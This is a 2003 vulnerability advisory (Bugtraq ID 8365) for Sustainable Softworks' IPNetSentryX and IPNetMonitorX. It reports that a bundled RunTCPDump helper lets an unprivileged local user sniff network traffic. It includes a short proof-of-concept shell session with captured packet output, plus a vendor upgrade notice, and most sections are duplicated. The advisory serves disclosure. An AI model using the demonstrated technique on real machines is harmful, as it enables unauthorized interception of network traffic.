IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance Vulnerability
BID:8365
Info
IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance Vulnerability
| Bugtraq ID: | 8365 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Aug 07 2003 12:00AM |
| Updated: | Aug 07 2003 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to Dave G. <[email protected]> of @stake, Inc. |
| Vulnerable: |
Sustainable Softworks IPNetSentryX Sustainable Softworks IPNetMonitorX |
| Not Vulnerable: | |
Discussion
IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance Vulnerability
It has been reported that helper applications that are shipped with IPNetSentryX and IPNetMonitorX may be harnessed by a local attacker to provide for unauthorized network reconnaissance.
It has been reported that helper applications that are shipped with IPNetSentryX and IPNetMonitorX may be harnessed by a local attacker to provide for unauthorized network reconnaissance.
Exploit / POC
IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance Vulnerability
The following demonstration has been supplied:
bash-2.05a$ id
uid=503(dummy) gid=20(staff) groups=20(staff)
bash-2.05a$ pwd
/Applications/IPNetSentryX.app/Contents/Resources
bash-2.05a$ ./RunTCPDump -i en1 -x -v -s 4096
RunTCPDump: listening on en1
18:02:55.726143 arp who-has 192.168.0.1 tell 192.168.0.1
0001 0800 0604 0001 XXXX XXXX XXXX XXXX
0001 0000 0000 0000 c0a8 0001 0000 0000
0000 0000 0000 0000 0000 0000 0000
The following demonstration has been supplied:
bash-2.05a$ id
uid=503(dummy) gid=20(staff) groups=20(staff)
bash-2.05a$ pwd
/Applications/IPNetSentryX.app/Contents/Resources
bash-2.05a$ ./RunTCPDump -i en1 -x -v -s 4096
RunTCPDump: listening on en1
18:02:55.726143 arp who-has 192.168.0.1 tell 192.168.0.1
0001 0800 0604 0001 XXXX XXXX XXXX XXXX
0001 0000 0000 0000 c0a8 0001 0000 0000
0000 0000 0000 0000 0000 0000 0000
Solution / Fix
IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance Vulnerability
Solution:
The vendor has released an upgrade to address this issue:
Sustainable Softworks IPNetSentryX
Sustainable Softworks IPNetMonitorX
Solution:
The vendor has released an upgrade to address this issue:
Sustainable Softworks IPNetSentryX
-
Sustainable Softworks IPNetSentryX and IPNetMonitorX Upgrades
http://www.sustworks.com/site/downloads.html
Sustainable Softworks IPNetMonitorX
-
Sustainable Softworks IPNetSentryX and IPNetMonitorX Upgrades
http://www.sustworks.com/site/downloads.html
References
IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance Vulnerability
References:
References:
- IPNetMonitorX and IPNetSentryX Homepage (Sustainable Softworks)